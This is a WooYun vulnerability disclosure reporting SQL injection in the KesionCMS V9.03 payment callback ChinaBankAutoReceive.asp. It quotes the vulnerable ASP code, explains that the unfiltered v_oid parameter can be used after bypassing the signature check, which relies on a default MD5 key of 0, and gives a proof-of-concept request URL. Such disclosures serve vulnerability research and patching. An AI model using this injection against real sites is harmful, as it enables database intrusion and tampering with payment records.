当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019057

漏洞标题:KesionCMS V9.03 Final SQL注射漏洞

相关厂商:KesionCMS

漏洞作者: My5t3ry

提交时间:2013-02-22 17:31

修复时间:2013-04-08 17:32

公开时间:2013-04-08 17:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-02-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-04-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

昨天提交科讯getshell的洞,通知官方后,说是V9移除wap模块.....
然后就没下文了,好吧,那就来个V9的

详细说明:

漏洞存在于User/ChinaBankAutoReceive.asp

<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<%option explicit%>
<!--#include file="../Conn.asp"-->
<!--#include file="../Plus/md5.asp"-->
<!--#include file="../KS_Cls/Kesion.MemberCls.asp"-->
<!--#include file="payfunction.asp"-->
<%
'****************************************************
' Software name:Kesion CMS 9.0
' Email: [email protected] . QQ:111394,9537636
' Web: http://www.kesion.com http://www.kesion.cn
' Copyright (C) Kesion Network All Rights Reserved.
'****************************************************
Response.Buffer = true 
Response.Expires = 1 
Response.CacheControl = "no-cache"
Dim KSUser:Set KSUser=New UserCls
Dim KS:Set KS=New PublicCls
Dim PaymentPlat:PaymentPlat=1
Dim RSP:Set RSP=Server.CreateObject("ADODB.RECORDSET")
RSP.Open "Select top 1 * From KS_PaymentPlat where id=" & PaymentPlat,conn,1,1
If RSP.Eof Then
		 RSP.Close:Set RSP=Nothing
		 Response.Write "Error!"
		 Response.End()
End If
Dim AccountID:AccountID=RSP("AccountID")
Dim MD5Key:MD5Key=RSP("MD5Key")
Dim PayOnlineRate:PayOnlineRate=KS.ChkClng(RSP("Rate")) 
Dim RateByUser:RateByUser=KS.ChkClng(RSP("RateByUser")) 
RSP.Close:Set RSP=Nothing
 Call ChinaBank()
'网银在线返回
Sub ChinaBank() 
 Dim v_oid,v_pmode,v_pstatus,v_pstring,v_string,v_amount,v_moneytype,remark2,v_md5str,text,md5text,zhuangtai
' 取得返回参数值
	v_oid=request("v_oid")                               ' 商户发送的v_oid定单编号
	v_pmode=request("v_pmode")                           ' 支付方式(字符串) 
	v_pstatus=request("v_pstatus")                       ' 支付状态 20(支付成功);30(支付失败)
	v_pstring=request("v_pstring")                       ' 支付结果信息 支付完成(当v_pstatus=20时);失败原因(当v_pstatus=30时);
	v_amount=request("v_amount")                         ' 订单实际支付金额
	v_moneytype=request("v_moneytype")                   ' 订单实际支付币种
	remark2=request("remark2")                           ' 备注字段2
	v_md5str=request("v_md5str")                         ' 网银在线拼凑的Md5校验串
	if request("v_md5str")="" then
		response.Write("v_md5str:空值")
		response.end
	end if
	text = v_oid&v_pstatus&v_amount&v_moneytype&MD5Key 'md5校验
	md5text = Ucase(trim(md5(text,32)))    '商户拼凑的Md5校验串
	if md5text<>v_md5str then		' 网银在线拼凑的Md5校验串 与 商户拼凑的Md5校验串 进行对比
	  	response.write("error") '告诉服务器验证失败,要求重发
	    response.end '中断程序
	else
	  response.write("ok")
	  if v_pstatus=20 then '支付成功
		Call UpdateOrder(v_amount,remark2,v_oid,v_pmode)
		Conn.Execute("Update KS_LogMoney Set PaymentID=1 Where OrderID='" & v_oid & "'")
	  else
	   	response.write("error") '告诉服务器验证失败,要求重发
	    response.end '中断程序
	  end if
	end if
end Sub
%>


上面代码中的v_oid=request("v_oid")没有过滤,然后就调用了

Call UpdateOrder(v_amount,remark2,v_oid,v_pmode)


我们接着看UpdateOrder

Sub UpdateOrder(v_amount,remark2,v_oid,v_pmode)
 Dim KSUser:Set KSUser=New UserCls
 Dim UserName,MoneyType,Money,Remark,sqlUser,rsUser,orderid,mobile,Action
 orderid=v_oid
 IF Cbool(KSUser.UserLoginChecked) Then UserName=KSUser.UserName Else UserName=KS.S("UserName")
         
		 '=======================如果从request里得不到数据,则重新取值=================
		 If UserName="" Then UserName=SUserName
		 Dim UserCardID
		 UserCardID=KS.ChkClng(KS.S("UserCardID"))
		 iF UserCardID=0 Then UserCardID=sUserCardID
		 Action=KS.G("Action"): If Action="" Then Action=Saction
		 '==============================================================================
		 
         Mobile=KSUser.GetUserInfo("Mobile")
		 Money=v_amount
		 Remark=remark2
		 Dim RSLog,RS
		Set RSLog=Server.CreateObject("ADODB.RECORDSET")
		RSLog.Open "Select top 1 * From KS_LogMoney where orderid='" & v_oid & "'",Conn,1,1
		if RSLog.Eof And RSLog.BoF Then
			 Select Case Action
			 case "shop"   '商城中心购物
				 Set RS=Server.CreateObject("ADODB.RECORDSET")
				 RS.Open "Select top 1 * From KS_Order Where OrderID='" & v_oid & "'",Conn,1,3
				 If RS.Eof Then
				   RS.Close:Set RS=Nothing
				   KS.Die "<br><li>支付过程中遇到问题,请联系网站管理员!"
				 End If
				  If Mobile="" Then
				  Mobile=RS("Mobile")
				  End If
				  RS("MoneyReceipt")=Money
				  If Money>=RS("MoneyTotal") Then
					RS("PayStatus")=1  '已付清
				  ElseIf Money<>0 Then
					 RS("PayStatus")=2  '已收定金
				  Else
					 RS("PayStatus")=0  '未付款
				  End If
				  Dim OrderStatus:OrderStatus=rs("status")
				  RS("Status")=1
				  RS("PaymentPlatId")=KS.ChkClng(Request("PaymentPlat"))  '支付接口ID
				  RS("PayTime")=now   '记录付款时间
				  RS.Update
                  orderid=RS("OrderID")
				  Dim XID:XID=RS("ID")
				  Call KS.MoneyInOrOut(rs("UserName"),RS("Contactman"),Money,2,1,now,rs("orderid"),"System","为购买订单:" &v_oid & "使用" & v_pmode & "在线充值",0,0,0)
		          Call KS.MoneyInOrOut(rs("UserName"),RS("Contactman"),Money,4,2,now,rs("orderid"),"System",Remark,0,0,0)
				  
					
					'====================更新库存量========================
					Dim rsp:set rsp=conn.execute("select id,title from ks_product where id in(select proid from KS_OrderItem where orderid='" & rs("orderid") & "')")
					do while not rsp.eof
					
					  dim rsi:set rsi=conn.execute("select amount,attrid from ks_orderitem where orderid='" & rs("orderid") & "' and proid=" & rsp(0))
					  if not rsi.eof then
						  if OrderStatus<>1 Then  '扣库存量
						   If RSI("AttrID")<>0 Then
			                  Conn.Execute("update KS_ShopSpecificationPrice set amount=amount-" & RSI(0) & " Where amount>=" & RSI(0) & " and ID=" & RSI(1))
			              Else
						   conn.execute("update ks_product set totalnum=totalnum-" & rsi(0) &" where totalnum>=" & rsi(0) &" and id=" & rsp(0))        
						  End If
						  End If
					  end if
					  rsi.close
					  set rsi=nothing
					  
					  'Call KS.ScoreInOrOut(UserName,1,KS.ChkClng(rsp(0))*amount,"系统","购买商品<font color=red>" & rsp("title") & "</font>赠送!",0,0)
					  
					rsp.movenext
					loop
					rsp.close
					set rsp=nothing
					'================================================================
					
					RS.Close:Set RS=Nothing
					IF KS.C("UserName")<>"" Then response.Redirect "User_Order.asp?Action=ShowOrder&ID=" & XID
			 Case else   '会员中心充值
					Set rsUser=Server.CreateObject("Adodb.RecordSet")
					sqlUser="select top 1 * from KS_User where UserName='" & UserName & "'"
					rsUser.Open sqlUser,Conn,1,1
					if rsUser.bof and rsUser.eof then
								Response.Write "<br><li>充值过程中遇到问题,请联系网站管理员!"
								rsUser.close:set rsUser=Nothing
								exit sub
					end if
					Dim RealName:RealName=rsUser("RealName")
					Dim Edays:Edays=rsUser("Edays")
					Dim BeginDate:BeginDate=rsUser("BeginDate")
					rsUser.Close : Set rsUser=Nothing
					If UserCardID<>0 Then   '充值卡
					       Call UpdateByCard(0,UserCardID,UserName,RealName,Edays,BeginDate,v_oid,v_pmode)
					Else
				  	 Call KS.MoneyInOrOut(UserName,RealName,Money,3,1,now,v_oid,"System",v_pmode & "在线充值,订单号为:" & v_oid,0,0,0)
					End If
					
			 End Select
			 
		End If
		RSLog.Close:Set RSLog=Nothing
End Sub


RSLog.Open "Select top 1 * From KS_LogMoney where orderid='" & v_oid & "'",Conn,1,1


这句带入SQL了!那么然后构造参数才能触发漏洞呢?
我们这样构造:
/User/ChinaBankAutoReceive.asp?v_oid=1%27&v_pstatus=20&v_amount=1&v_moneytype=1&v_md5str=9B5BF7166AFBB5E1602BBCC964459B9B
其中的v_oid带入我们的SQL注射语句...你懂的,后面的v_md5str是md5(v_oid&v_pstatus&v_amount&v_moneytype&MD5Key)得到的,MD5Key的值来自数据库值为0
简单地说,v_oid构造SQL后,md5(v_oid&v_pstatus&v_amount&v_moneytype&MD5Key)计算出v_md5str,然后提交就行了

漏洞证明:

/User/ChinaBankAutoReceive.asp?v_oid=1%27&v_pstatus=20&v_amount=1&v_moneytype=1&v_md5str=9B5BF7166AFBB5E1602BBCC964459B9B

ke.jpg

修复方案:

过滤,你懂的

版权声明:转载请注明来源 My5t3ry@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝